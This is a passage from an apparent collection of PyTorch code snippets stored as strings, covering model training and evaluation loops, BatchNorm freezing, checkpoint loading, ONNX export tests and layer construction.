cfg.MODEL.PRETRAINED_BACKBONE_WEIGHTS)\n return\n\n pretrained_detectron = torch.load(pretrained_weights)\n\n if cfg.RPN.RPN_ON:\n load_layers = ['Conv_Body', 'RPN']\n else:\n load_layers = ['Conv_Body']\n\n mapping, _ = self.detectron_weight_mapping()\n state_dict = {}\n ckpt = pretrained_detectron['model']\n for name in ckpt:\n if name.split('.')[0] in load_layers:\n if mapping[name]:\n state_dict[name] = ckpt[name]\n self.load_state_dict(state_dict, strict=False)\n del pretrained_detectron\n torch.cuda.empty_cache()", "def test(model, test_loader, device):\n model.eval()\n test_loss = 0\n accuracy = 0\n with torch.no_grad():\n for inputs, labels in test_loader:\n inputs = 
inputs.to(device)\n labels = labels.to(device)\n\n output = model.forward(inputs)\n\n # Calculate accuracy\n ps = torch.exp(output)\n top_p, top_class = ps.topk(1, dim=1)\n equals = top_class == labels.view(*top_class.shape)\n accuracy += torch.mean(equals.type(torch.FloatTensor)).item()\n\n print(f\"Accuracy on test set is: {accuracy/len(test_loader):.3f}\")", "def train(self, mode=True, freeze_bn=False):\n super(NetFeat, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def get_adversary_models(self, mode: str) -> List[torch.nn.Module]:\n pass", "def test_single_pytorch_module_mapping_to_many_onnx_nodes(self):\n\n AimetLogger.set_level_for_all_areas(logging.DEBUG)\n\n class TwoLayerLstmModel(torch.nn.Module):\n \"\"\"\n Model using torch.nn.LSTM module\n \"\"\"\n def __init__(self):\n super(TwoLayerLstmModel, self).__init__()\n self.lstm = torch.nn.LSTM(input_size=3, hidden_size=5, num_layers=3)\n\n def forward(self, x, hx=None):\n return self.lstm(x, hx)\n\n model_name = 'multilayer_lstm'\n model = TwoLayerLstmModel()\n dummy_input = torch.randn(10, 1, 3)\n\n torch.onnx.export(model, dummy_input, './data/' + model_name + '.onnx')\n onnx_utils.OnnxSaver.set_node_names('./data/' + model_name + '.onnx', model, dummy_input, is_conditional=False,\n module_marker_map={})\n onnx_model = onnx.load('./data/' + model_name + '.onnx')\n\n lstm_nodes = [node for node in onnx_model.graph.node if node.op_type == 'LSTM']\n assert 3 == len(lstm_nodes)\n\n node_to_io_dict, _ = onnx_utils.OnnxSaver.get_onnx_node_to_io_tensor_names_map(onnx_model)\n assert isinstance(node_to_io_dict['lstm#root_node'], list)\n assert 3 == len(node_to_io_dict['lstm#root_node'])", "def __call__(self, manager=None):\n # set up a reporter\n reporter = reporting.Reporter()\n if self.name is not None:\n prefix = self.name + '/'\n else:\n prefix = ''\n for name, target in self._targets.items():\n reporter.add_observer(prefix + name, target)\n reporter.add_observers(prefix + name,\n target.named_modules())\n\n with reporter:\n with torch.no_grad():\n result = self.evaluate()\n\n reporting.report(result)\n return result", "def run_performance( pkg_mod_iter ):\n for package, module_iter in pkg_mod_iter:\n print( package )\n print( \"=\"*len(package ) )\n print()\n for filename, modname in module_iter:\n print( filename, modname )\n try:\n module= __import__( package+\".\"+modname, fromlist=(modname,\"performance\") )\n module.performance()\n except AttributeError:\n pass # no performance() function in the module.", "def train(self, mode=True):\n super(CRNN, self).train(mode)\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n if self.freeze_bn:\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n if self.freeze_bn:\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def _test(self):\n self.pytorch_layer.eval()\n pytorch_layer = copy.deepcopy(self.pytorch_layer).cpu()\n image_w_h = int(self.input_size ** 0.5)\n input_image = torch.rand(1, self.n_in_channels, image_w_h, image_w_h)\n output_tensor = pytorch_layer(input_image)[0]\n for channel in range(self.n_in_channels):\n current_channel = input_image[0, channel].squeeze().flatten().cpu().numpy()\n normalized_data = (current_channel - self.running_mean[channel]) / np.sqrt(\n self.running_var[channel] + 
self.epsilon\n )\n if self.affine:\n output_numpy = (self.weights[channel] * normalized_data) + self.bias[\n channel\n ]\n else:\n output_numpy = normalized_data\n\n assert np.isclose(\n output_numpy,\n output_tensor[channel].detach().flatten().cpu().numpy(),\n atol=1e-6,\n ).all()", "def eval_net(net, loader, device, batch_size, threshold):\n net.eval()\n dice = 0\n acc_score = 0\n rec_score = 0\n f1_score = 0\n pres_score = 0\n jacc_score = 0\n\n for batch in loader:\n imgs = batch['image']\n true_masks = batch['mask']\n\n imgs = imgs.to(device=device, dtype=torch.float32)\n mask_type = torch.float32 if net.n_classes == 1 else torch.long\n true_masks = true_masks.to(device=device, dtype=mask_type)\n\n mask_pred = net(imgs)\n\n for true_mask, pred in zip(true_masks, mask_pred):\n pred = (pred > threshold).float()\n if net.n_classes > 1:\n dice += F.cross_entropy(pred.unsqueeze(dim=0), true_mask.unsqueeze(dim=0)).item()\n else:\n dice += dice_coeff(pred, true_mask.squeeze(dim=1)).item()\n pred = pred.detach().cpu().numpy()\n pred = pred.astype(int)\n pred = np.matrix.flatten(pred)\n\n true_mask = true_mask.cpu().numpy()\n true_mask = true_mask.astype(int)\n true_mask = np.matrix.flatten(true_mask)\n\n jacc_score += jaccard_score(true_mask, pred)\n acc_score += accuracy_score(true_mask, pred)\n pres_score += precision_score(true_mask, pred)\n rec_score += recall_score(true_mask, pred)\n\n dice = (dice / (len(loader) * batch_size))\n jacc_score = (jacc_score / (len(loader) * batch_size))\n acc_score = (acc_score / (len(loader) * batch_size))\n pres_score = (pres_score / (len(loader) * batch_size))\n rec_score = (rec_score / (len(loader) * batch_size))\n if (pres_score + rec_score) > 0:\n f1_score = 2 * (pres_score * rec_score) / (pres_score + rec_score)\n else:\n f1_score = 0\n\n print(\"Dice: \", dice)\n print(\"Jaccard_score: \", jacc_score)\n print(\"Accuracy: \", acc_score)\n print(\"Precision: \", pres_score)\n print(\"Recall: \", rec_score)\n print(\"F1_score: \", f1_score)\n return dice, jacc_score, acc_score, pres_score, rec_score, f1_score", "def framework_load_weights(self):\n omit_modules = cfg.get('omit_modules_from_loading', [])\n\n for dest_module_path, path in self.get_load_paths():\n _print(\"Loading submodule \\\"{}\\\" from {}.\".format(dest_module_path, path))\n\n if \":\" in path:\n source_module_path, source_path = path.split(':')\n else:\n source_path = path\n source_module_path = dest_module_path\n\n start = time.time()\n\n device = get_pytorch_device()\n\n loaded_state_dict = torch.load(source_path, map_location=device)['model']\n\n if source_module_path:\n source_module_path_with_sep = source_module_path + '.'\n\n loaded_state_dict = type(loaded_state_dict)(\n {k: v for k, v in loaded_state_dict.items() if k.startswith(source_module_path_with_sep)}\n )\n\n assert loaded_state_dict, (\n f\"File contains no tensors with prefix `{source_module_path_with_sep}` (file: {source_path})\"\n )\n\n if dest_module_path != source_module_path:\n # Rename variables from the loaded state dict by replacing `source_module_path` with `dest_module_path`.\n\n _source_module_path = source_module_path + '.' if source_module_path else source_module_path\n _dest_module_path = dest_module_path + '.' 
if dest_module_path else dest_module_path\n\n loaded_state_dict = {\n k.replace(_source_module_path, _dest_module_path, 1): v\n for k, v in loaded_state_dict.items()\n }\n\n module = self.updater.model\n\n state_dict = module.state_dict()\n\n intersection = set(state_dict.keys()) & set(loaded_state_dict.keys())\n\n if not intersection:\n raise Exception(\n f\"Loading variables with spec ({dest_module_path}, {path}) \"\n f\"would have no effect (no variables found).\"\n )\n loaded_state_dict = {k: loaded_state_dict[k] for k in intersection}\n\n if omit_modules:\n omitted_variables = {\n k: v for k, v in loaded_state_dict.items()\n if any(k.startswith(o) for o in omit_modules)\n }\n\n print(\"Omitting the following variables from loading:\")\n describe_structure(omitted_variables)\n\n loaded_state_dict = {\n k: v for k, v in loaded_state_dict.items()\n if k not in omitted_variables\n }\n\n _print(\"Loading variables:\")\n describe_structure(loaded_state_dict)\n\n state_dict.update(loaded_state_dict)\n\n module.load_state_dict(state_dict, strict=True)\n\n _print(\"Done loading weights for module {}, took {} seconds.\".format(dest_module_path, time.time() - start))", "def run_inference(model: torch.nn.Module,\n model_inputs: Dict[str, torch.Tensor]) -> list:\n return model(**model_inputs, return_loss=False)", "def forward(self, features):\n outputs = {} \n #features = self.bn(self.linear(features))\n for i in range(len(self.module_list)): \n x = self.module_list[i](features)\n outputs[i] = x\n\n return outputs", "def load_cnns(self):\n self.cnn1 = cnn_utils.CNN()\n self.cnn1.load_state_dict(torch.load(f'{self.model_dir}/model1.pt'))\n self.cnn1.eval()\n self.cnn2 = cnn_utils.CNN()\n self.cnn2.load_state_dict(torch.load(f'{self.model_dir}/model2.pt'))\n self.cnn2.eval()", "def eval_net(net, loader, device, n_val, cfg):\n net.eval()\n tot = 0\n bce_loss = 0\n dice_coef = 0\n with tqdm(total=n_val, desc='Validation round', unit='img', leave=False) as pbar:\n for imgs, true_masks in loader:\n # for batch in loader:\n # imgs = batch['image']\n # true_masks = batch['mask']\n\n imgs = imgs.to(device=device, dtype=torch.float32)\n mask_type = torch.float32 #if cfg.n_classes == 1 else torch.long\n true_masks = true_masks.to(device=device, dtype=mask_type)\n criterion_1 = BCE = F.binary_cross_entropy #(inputs, targets, reduction='mean')#StableBCELoss()#binary_xloss\n criterion_2 = DiceLoss()\n # compute loss\n if cfg.deepsupervision:\n masks_preds = net(imgs)\n for masks_pred in masks_preds:\n tot_ = 0\n tot_bce = 0\n tot_dice = 0\n for true_mask, pred in zip(true_masks, masks_pred):\n pred = (pred > cfg.out_threshold).float()\n if cfg.n_classes > 1:\n bce = criterion_1(F.sigmoid(pred), true_mask) \n dice = criterion_2(pred, true_mask.float())\n # sub_cross_entropy = F.cross_entropy(pred, true_mask).item()\n # sub_cross_entropy = F.cross_entropy(pred.unsqueeze(dim=0), true_mask.unsqueeze(dim=0).squeeze(1)).item()\n else:\n sub_cross_entropy = dice_coeff(pred, true_mask.squeeze(dim=1)).item()\n tot_bce += bce\n tot_dice += dice\n tot_bce = tot_bce / len(masks_preds)\n tot_dice = tot_dice / len(masks_preds)\n bce_loss += tot_bce\n dice_coef += tot_dice\n tot_ += tot_bce\n tot_ += tot_dice\n tot += tot_\n else:\n masks_pred = net(imgs)\n for true_mask, pred in zip(true_masks, masks_pred):\n pred = (pred > cfg.out_threshold).float()\n if cfg.n_classes > 1:\n tot += F.cross_entropy(pred.unsqueeze(dim=0), true_mask.unsqueeze(dim=0).squeeze(1)).item()\n else:\n tot += dice_coeff(pred, 
true_mask.squeeze(dim=1)).item()\n\n pbar.update(imgs.shape[0])\n\n return tot / n_val, bce_loss / n_val, dice_coef / n_val,", "def set_module_trainable(module: nn.Module, mode: bool) -> None:\n for param in module.parameters():\n param.requires_grad = mode", "def train_and_eval(self):\n self.__create_indexes()\n model = None\n model = None\n if self.model == 'OMult':\n model = OMult(self.kwargs)\n elif self.model == 'ConvO':\n model = ConvO(self.kwargs)\n elif self.model == 'QMult':\n model = QMult(self.kwargs)\n elif self.model == 'ConvQ':\n model = ConvQ(self.kwargs)\n elif self.model == 'OMultBatch':\n model = OMultBatch(self.kwargs)\n elif self.model == 'ConvOBatch':\n model = ConvOBatch(self.kwargs)\n elif self.model == 'QMultBatch':\n model = QMultBatch(self.kwargs)\n elif self.model == 'ConvQBatch':\n model = ConvQBatch(self.kwargs)\n else:\n print(self.model, ' is not valid name')\n raise ValueError\n\n self.train(model)\n self.eval(model)", "def train(self, mode=True):\n nn.Module.train(self, mode)\n\n if mode:\n # Set all bn layers in backbone to eval mode\n def set_bn_eval(m):\n classname = m.__class__.__name__\n if classname.find(\"BatchNorm\") != -1:\n m.eval()\n\n self.backbone.apply(set_bn_eval)", "def test_model(model: nn.Module, test_set: data.DataLoader, number_of_classes: int) -> Tuple[score.FloatScore, score.DictScore]:\n # model.eval is used for ImageNet models, batchnorm or dropout layers will work in eval mode.\n model.eval()\n\n def test_average() -> score.FloatScore:\n correct = 0\n total = 0\n\n with torch.set_grad_enabled(False):\n for (inputs, yreal) in tqdm(test_set, unit=\"images\", desc=\"Testing model (average)\", leave=True, ascii=True):\n inputs, yreal = inputs.cuda(), yreal.cuda()\n\n ypred = model(inputs)\n _, predicted = torch.max(ypred.data, 1)\n\n total += yreal.size(0)\n correct += (predicted == yreal).sum().item()\n\n accuracy = 100 * correct / total\n log.info(\"Accuracy of the network on the {} test images (average): {}\".format(total, accuracy))\n with open('epoch_logs.txt', 'a+') as file:\n file.write('Test Acc: {}\\n'.format(accuracy))\n return score.FloatScore(accuracy)\n\n def test_per_class() -> score.DictScore:\n class_correct = list(0. for _ in range(number_of_classes))\n class_total = list(0. 
for _ in range(number_of_classes))\n total = 0\n\n with torch.no_grad():\n for (inputs, yreal) in tqdm(test_set, unit=\"images\", desc=\"Testing model (per class)\", leave=True, ascii=True):\n inputs, yreal = inputs.cuda(), yreal.cuda()\n\n total += yreal.size(0)\n\n ypred = model(inputs)\n _, predicted = torch.max(ypred, 1)\n c = (predicted == yreal).squeeze()\n for i in range(yreal.shape[0]):\n label = yreal[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\n log.info(\"Accuracy of the network on the {} test images (per-class):\".format(total))\n\n per_class_accuracy = {}\n for i in range(number_of_classes):\n accuracy = 100 * class_correct[i] / (class_total[i] + 0.0001)\n per_class_accuracy[i] = accuracy\n print('Accuracy of %5s : %2d %%' % (\n i, accuracy))\n\n return score.DictScore(per_class_accuracy)\n\n return test_average(), test_per_class()", "def eval(self):\n\n # parameters initialize\n torch = import_optional_dependency(\"torch\")\n eval_total = 0\n eval_correct = 0\n eval_loss = 0\n self._set_eval()\n\n # display the information\n if self.info:\n print(f\"\\rEvaluating...\", end=\"\")\n\n # start eval part\n for i, (source, target) in enumerate(self.eval_dataset):\n # send data to device\n source = source.to(self.device)\n target = target.to(self.device)\n\n result = self.model(source)\n eval_loss += self.criterion(result, target).item()\n _, predicted = torch.max(result.data, 1)\n eval_total += target.size(0)\n eval_correct += (predicted == target).sum().item()\n\n accuracy = eval_correct / eval_total\n eval_loss = eval_loss / eval_total\n\n if self.info:\n print(f\"\\rEvaluation loss: { eval_loss } | Accuracy: { accuracy }\")\n\n return eval_loss, accuracy", "def evaluate(data_loader, model, device):\n model.eval()\n\n loss_ = []\n with torch.no_grad():\n for idx, batch in enumerate(data_loader):\n data = batch.to(device)\n outputs = model.forward(data)\n loss_.append(F.l1_loss(outputs, data).data.numpy())\n\n return np.mean(loss_)", "def load_modules(bot, config):\n for item in MODULES:\n importlib.import_module(\"cogs.\" + item).setup(bot, config)", "def validate_kitti(model, args, eval_loader, group, iters=24):\n model.eval()\n epe_list = torch.zeros(2).cuda(device=args.gpu)\n out_list = torch.zeros(2).cuda(device=args.gpu)\n\n for val_id, batch in enumerate(tqdm(eval_loader)):\n image1, image2, flow_gt, valid_gt = batch\n\n image1 = Variable(image1, requires_grad=True)\n image1 = image1.cuda(args.gpu, non_blocking=True)\n\n image2 = Variable(image2, requires_grad=True)\n image2 = image2.cuda(args.gpu, non_blocking=True)\n\n flow_gt = Variable(flow_gt, requires_grad=True)\n flow_gt = flow_gt.cuda(args.gpu, non_blocking=True)\n flow_gt = flow_gt[0]\n\n valid_gt = Variable(valid_gt, requires_grad=True)\n valid_gt = valid_gt.cuda(args.gpu, non_blocking=True)\n valid_gt = valid_gt[0]\n\n padder = InputPadder(image1.shape, mode='kitti')\n image1, image2 = padder.pad(image1, image2)\n\n flow_low, flow_pr = model(image1, image2, iters=iters, test_mode=True)\n flow = padder.unpad(flow_pr[0])\n\n epe = torch.sum((flow - flow_gt)**2, dim=0).sqrt()\n mag = torch.sum(flow_gt**2, dim=0).sqrt()\n\n epe = epe.view(-1)\n mag = mag.view(-1)\n val = valid_gt.view(-1) >= 0.5\n\n out = ((epe > 3.0) & ((epe/mag) > 0.05)).float()\n\n epe_list[0] += epe[val].mean().item()\n epe_list[1] += 1\n\n out_list[0] += out[val].sum()\n out_list[1] += torch.sum(val)\n\n if args.distributed:\n dist.all_reduce(tensor=epe_list, op=dist.ReduceOp.SUM, group=group)\n 
dist.all_reduce(tensor=out_list, op=dist.ReduceOp.SUM, group=group)\n\n if args.gpu == 0:\n epe = epe_list[0] / epe_list[1]\n f1 = 100 * out_list[0] / out_list[1]\n\n print(\"Validation KITTI: %f, %f\" % (epe, f1))\n return {'kitti-epe': float(epe.detach().cpu().numpy()), 'kitti-f1': float(f1.detach().cpu().numpy())}\n else:\n return None", "def _conventional_precalculation(self):\n # Run all modules\n for module in self._conventional_modules:\n module.compute()", "def test_versioned_symbols(self):\n class MyModule(torch.nn.Module):\n def __init__(self):\n super(MyModule, self).__init__()\n\n def forward(self, a, b, alpha: float):\n no_alpha = torch._test_serialization_subcmul(a, b)\n with_alpha = torch._test_serialization_subcmul(a, b, alpha)\n return no_alpha, with_alpha\n\n def historic_subcmul(a, b, alpha=2):\n return b - alpha * a\n\n def current_subcmul(a, b, alpha=1):\n return a - alpha * b\n\n # Loads and verifies the historic behavior of the module\n # that was serialized with version 2\n module_v2 = torch.jit.load(pytorch_test_dir + \"/jit/fixtures/_test_serialization_subcmul_v2.pt\")\n a = torch.randn((5,))\n b = torch.randn((5,))\n alpha = random.random()\n args = (a, b, alpha)\n no_alpha_v2, with_alpha_v2 = module_v2(*args)\n self.assertEqual(no_alpha_v2, historic_subcmul(a, b))\n self.assertEqual(with_alpha_v2, historic_subcmul(*args))\n\n # Scripts, saves, loads and verifies the current behavior of the module\n scripted_module = torch.jit.script(MyModule())\n buffer = io.BytesIO()\n torch.jit.save(scripted_module, buffer)\n buffer.seek(0)\n module_current = torch.jit.load(buffer)\n no_alpha_current, with_alpha_current = module_current(*args)\n self.assertEqual(no_alpha_current, current_subcmul(a, b))\n self.assertEqual(with_alpha_current, current_subcmul(*args))", "def _evaluate_during_fit(self, test_loader, epoch):", "def blocks2modules(blocks, net_info, device=\"cpu\"):\n modules = torch.nn.ModuleList()\n\n # Track number of channels (filters) in the output of each layer; this\n # is necessary to determine layer input/output shapes for various layers.\n curr_out_channels = None\n prev_layer_out_channels = net_info[\"channels\"]\n out_channels_list = []\n\n for i, block in enumerate(blocks):\n module = torch.nn.Sequential()\n\n if block[\"type\"] == \"convolutional\":\n batch_normalize = \"batch_normalize\" in block\n bias = not batch_normalize\n kernel_size = block[\"size\"]\n padding = (kernel_size - 1) // 2 if \"pad\" in block else 0\n in_channels = prev_layer_out_channels\n out_channels = block[\"filters\"]\n\n conv = torch.nn.Conv2d(\n in_channels=in_channels, out_channels=out_channels,\n kernel_size=kernel_size, stride=block[\"stride\"],\n padding=padding, bias=bias\n )\n module.add_module(\"conv_{}\".format(i), conv)\n\n if batch_normalize:\n bn = torch.nn.BatchNorm2d(num_features=out_channels)\n module.add_module(\"batch_norm_{}\".format(i), bn)\n\n if block[\"activation\"] == \"leaky\":\n acti = torch.nn.LeakyReLU(negative_slope=0.1, inplace=True)\n module.add_module(\"leaky_{}\".format(i), acti)\n elif block[\"activation\"] == \"linear\":\n # NOTE: Darknet src files call out \"linear\" vs \"relu\" but we\n # use ReLU here.\n acti = torch.nn.ReLU(inplace=True)\n\n # Update the number of current (output) channels.\n curr_out_channels = out_channels\n\n elif block[\"type\"] == \"maxpool\":\n stride = block[\"stride\"]\n maxpool = MaxPool2d(\n kernel_size=block[\"size\"], stride=stride\n )\n module.add_module(\"maxpool_{}\".format(i), maxpool)\n\n elif block[\"type\"] 
== \"route\":\n # Route layer concatenates outputs along channel dim; add dummy\n # layer and handle the actual logic in Darknet.forward().\n module.add_module(\"route_{}\".format(i), DummyLayer())\n\n out_channels = sum(\n out_channels_list[layer_idx] for layer_idx in block[\"layers\"]\n )\n\n curr_out_channels = out_channels\n\n elif block[\"type\"] == \"shortcut\":\n # Shortcut layer sums outputs from previous layers; add dummy\n # layer and handle the actual logic in Darknet.forward().\n module.add_module(\"shortcut_{}\".format(i), DummyLayer())\n\n if \"activation\" in block:\n if block[\"activation\"] == \"leaky\":\n acti = torch.nn.LeakyReLU(negative_slope=0.1, inplace=True)\n module.add_module(\"leaky_{}\".format(i), acti)\n elif block[\"activation\"] == \"linear\":\n acti = torch.nn.ReLU(inplace=True)\n\n assert out_channels == out_channels_list[i + block[\"from\"]]\n curr_out_channels = out_channels\n\n elif block[\"type\"] == \"upsample\":\n # NOTE: torch.nn.Upsample is deprecated in favor of Interpolate;\n # consider using this and/or other interpolation methods?\n upsample = torch.nn.Upsample(\n scale_factor=block[\"stride\"], mode=\"nearest\"\n )\n module.add_module(\"upsample_{}\".format(i), upsample)\n\n elif block[\"type\"] == \"yolo\":\n yolo = YOLOLayer(block[\"anchors\"], block[\"mask\"], device=device)\n module.add_module(\"yolo_{}\".format(i), yolo)\n\n modules.append(module)\n prev_layer_out_channels = curr_out_channels\n out_channels_list.append(curr_out_channels)\n\n return modules", "def modules():", "def eval(self, feats):\n raise NotImplementedError", "def eval_all(folder):\n optimizers = [\n tf.keras.optimizers.Adadelta(learning_rate=0.01),\n tf.keras.optimizers.Adagrad(learning_rate=0.002),\n tf.keras.optimizers.Adam(learning_rate=0.0001),\n tf.keras.optimizers.Adamax(learning_rate=0.0005),\n tf.keras.optimizers.Ftrl(learning_rate=0.002),\n tf.keras.optimizers.Nadam(learning_rate=0.001),\n tf.keras.optimizers.RMSprop(learning_rate=0.0005),\n tf.keras.optimizers.SGD(learning_rate=0.003),\n ]\n\n epochs = [\n 500, 120, 80, 150, 300, 60, 100, 500\n ]\n\n biased_randomized = [\n (models.DefaultModel, False),\n (models.BiasedModel, False),\n (models.NeuralModel, False),\n (models.DefaultModel, True),\n (models.BiasedModel, True),\n (models.NeuralModel, True),\n ]\n\n for optimizer, n_epochs in zip(optimizers, epochs):\n for model, rndmz in biased_randomized:\n eval_optimizer(folder,\n model,\n optimizer,\n n_epochs,\n rndmz)", "def initialize_models(self): \n state_shape = list(self.env.observation_space.shape)\n img_height, img_width, n_channels = state_shape\n num_actions = self.env.action_space.n\n print(\"img_height: \", img_height)\n print(\"img_width: \", img_width)\n print(\"n_channels: \", n_channels)\n print(\"n_actions: \", num_actions)\n\n ##############################################################\n ################ YOUR CODE HERE - 25-30 lines lines ################\n modules = OrderedDict()\n\n # def conv_output_shape(h_w, kernel_size=1, stride=1, pad=0, dilation=1): -> h,w \n pad1 = (3 * img_height - 4 + 8) // 2\n modules['0'] = nn.Conv2d(n_channels * self.config.state_history, 32, 8, stride=4, padding=pad1)\n modules['relu1'] = nn.ReLU()\n out1h, out1w = conv_output_shape((img_height, img_width), kernel_size=8, stride=4, pad=pad1, dilation=1)\n\n pad2 = (out1w + 2) // 2\n modules['2'] = nn.Conv2d(32, 64, 4, stride=2, padding=pad2)\n modules['relu3'] = nn.ReLU()\n out2h, out2w = conv_output_shape((out1h, out1w), kernel_size=4, stride=2, pad=pad2, 
dilation=1)\n\n pad3 = 1\n modules['4'] = nn.Conv2d(64, 64, 3, stride=1, padding=pad3)\n modules['relu5'] = nn.ReLU()\n out3h, out3w = conv_output_shape((out2h, out2w), kernel_size=3, stride=1, pad=pad3, dilation=1)\n\n modules['flatten'] = nn.Flatten()\n modules['fc'] = nn.Linear(out3h*out3w*64, num_actions)\n self.q_network = nn.Sequential(modules)\n\n target_modules = OrderedDict()\n target_modules['t_layer1'] = nn.Conv2d(n_channels * self.config.state_history, 32, 8, stride=4, padding=pad1)\n target_modules['t_relu1'] = nn.ReLU()\n target_modules['t_layer2'] = nn.Conv2d(32, 64, 4, stride=2, padding=pad2)\n target_modules['t_relu2'] = nn.ReLU()\n target_modules['t_layer3'] = nn.Conv2d(64, 64, 3, stride=1, padding=pad3)\n target_modules['t_relu3'] = nn.ReLU()\n target_modules['t_flatten'] = nn.Flatten()\n target_modules['t_fc'] = nn.Linear(out3h*out3w*64, num_actions)\n self.target_network = nn.Sequential(target_modules)\n\n ##############################################################\n ######################## END YOUR CODE #######################", "def test_all_activations_work():\n nn_instance = RNN(layers_info=[[\"lstm\", 20], [\"gru\", 10], [\"linear\", 20], [\"linear\", 1]],\n hidden_activations=\"relu\", output_activation=None, dropout=0.0000001,\n initialiser=\"xavier\", input_dim=15)\n for key in nn_instance.str_to_activations_converter.keys():\n if key == \"none\": hidden_key = \"relu\"\n else: hidden_key = key\n model = RNN(layers_info=[[\"lstm\", 20], [\"gru\", 10], [\"linear\", 20], [\"linear\", 1]],\n hidden_activations=hidden_key, output_activation=key, dropout=0.0000001,\n initialiser=\"xavier\", input_dim=15)\n model(X)", "def set_eval(self):\n self.model.eval()", "def validation(model: nn.Module, criterion, valid_loader, num_classes): \n \n with torch.no_grad():\n model.eval()\n losses = []\n dice=[]\n iou=[]\n for inputs, targets,_ in valid_loader:\n inputs = utils.cuda(inputs)\n targets = utils.cuda(targets)\n outputs,_,_ = model(inputs)\n loss = criterion(outputs, targets)\n losses.append(loss.item())\n output_classes = outputs.data.cpu().numpy().argmax(axis=1)\n target_classes = targets.data.cpu().numpy().argmax(axis=1)\n dice += [general_dice(target_classes, output_classes)]\n iou += [general_jaccard(target_classes, output_classes)]\n\n valid_loss = np.mean(losses)\n average_iou = np.mean(iou)\n average_dices = np.mean(dice)\n\n print('Valid loss: {:.4f}, average IoU: {:.4f}, average Dice: {:.4f}'.format(valid_loss, average_iou, average_dices))\n\n return [valid_loss, average_iou]", "def eval_model(\n self,\n model: nn.Module,\n batch_size: int = 32,\n data: Union[str, th.utils.data.Dataset] = \"test\",\n collate_fn: Optional[Callable] = None,\n by_example: bool = False,\n label_map: Optional[Callable] = None,\n nll: bool = False,\n ):\n # Set model to test mode\n mode = model.training\n model.train(mode=False)\n # Select dataset for evaluation\n dataset = data\n if isinstance(data, str):\n dataset = self.get_split(data)\n elif not isinstance(dataset, th.utils.data.Dataset):\n raise ValueError(\n \"`data` must be a pytorch dataset or one of 'dev'/'valid'\"\n f\"/'test/'train', got {dataset.__class__.__name__} instead\"\n )\n # Dataloader\n data_loader = DataLoader(\n dataset,\n batch_size=batch_size,\n collate_fn=self.collate_fn if collate_fn is None else collate_fn,\n )\n y, y_hat, all_nlls = [], [], []\n for batch in data_loader:\n # Get model predictions\n with th.no_grad():\n nlls, _, predicted = self.nll(\n model,\n batch,\n reduction=\"none\",\n 
predict=True,\n )\n # Track predictions and reference\n y.append(batch[-1])\n y_hat.append(predicted)\n all_nlls.append(nlls)\n # Concatenate\n y = th.cat(y, dim=0).cpu()\n y_hat = th.cat(y_hat, dim=0).cpu()\n all_nlls = th.cat(all_nlls, dim=0).cpu()\n # Map predictions to labels (this is useful for single\n # head model evaluated on multiple tasks)\n if label_map:\n y_hat = th.tensor([label_map(y_hat_i.item()) for y_hat_i in y_hat])\n # Task specific score\n if by_example:\n score = (y == y_hat).float()\n else:\n score = self.score(y_hat, y)\n nlls = nlls.mean()\n # Reset model to the original mode\n model.train(mode=mode)\n\n result = score\n if nll:\n result = (score, all_nlls)\n return result", "def forward(self, x):\n result = x\n for module in self.modules:\n result = module.forward(result)\n return result", "def evaluate(args, model, tokenizer, eval_dataset, eval_dataloader, task_name, model_type, split, step):\n model.eval()\n processor = MoralStoriesProcessor()\n results = dict()\n softmax = torch.nn.Softmax(dim=1)\n\n # Eval!\n logger.info('***** Running evaluation on the validation / test set *****')\n logger.info(' Num examples = %d', len(eval_dataset))\n logger.info(' Batch size = %d', args.eval_batch_size)\n batch_losses = list()\n eval_loss = 0.0\n micro_loss, macro_loss = 0.0, 0.0\n num_batches, num_tokens = 0, 0\n preds = None\n soft_preds = None\n out_label_ids = None\n # Perform a single evaluation step\n for batch in tqdm(eval_dataloader, desc='Evaluating', mininterval=10, ncols=100):\n batch = tuple(t.to(args.device) for t in batch)\n with torch.no_grad():\n if 'gen' not in task_name:\n inputs = {'input_ids': batch[0],\n 'attention_mask': batch[1],\n 'token_type_ids': batch[2] if model_type == 'bert' else None,\n 'labels': batch[3]}\n else:\n inputs = {'input_ids': batch[0],\n 'attention_mask': batch[1],\n 'labels': batch[3]}\n if 'gpt2' not in model_type:\n # Prepare decoder inputs and labels for enc-dec models\n inputs['labels'] = batch[3][:, 1:].contiguous() # shift\n decoder_input_ids = batch[3][:, :-1].clone() # shift\n decoder_input_ids[decoder_input_ids == -100] = tokenizer.pad_token_id # remove masking\n inputs['decoder_input_ids'] = decoder_input_ids.contiguous()\n\n outputs = model(**inputs)\n\n tmp_eval_loss, logits = outputs[:2]\n soft_logits = softmax(logits)\n eval_loss += tmp_eval_loss.mean().item()\n batch_losses.append(tmp_eval_loss.item())\n\n if 'gen' not in task_name:\n if preds is None:\n preds = logits.detach().cpu().numpy()\n soft_preds = soft_logits.detach().cpu().numpy()\n out_label_ids = inputs['labels'].detach().cpu().numpy()\n else:\n preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)\n soft_preds = np.append(soft_preds, soft_logits.detach().cpu().numpy(), axis=0)\n out_label_ids = np.append(out_label_ids, inputs['labels'].detach().cpu().numpy(), axis=0)\n else:\n # Obtain per-token loss for perplexity computation\n batch_loss = get_token_loss(args, logits, batch[3], batch[4], model_type=model_type)\n macro_loss += batch_loss.mean().item()\n micro_loss += batch_loss.sum().item()\n num_batches += 1\n num_tokens += batch_loss.view(-1).shape[0]\n\n # Compute and update evaluation metric values\n if 'gen' not in task_name:\n # Isolate model predictions\n preds = np.argmax(preds, axis=1)\n soft_preds = soft_preds.tolist()\n curr_result = compute_cls_metrics(preds, out_label_ids)\n else:\n macro_perplexity = torch.exp(torch.tensor(macro_loss / num_batches)).item()\n micro_perplexity = torch.exp(torch.tensor(micro_loss / 
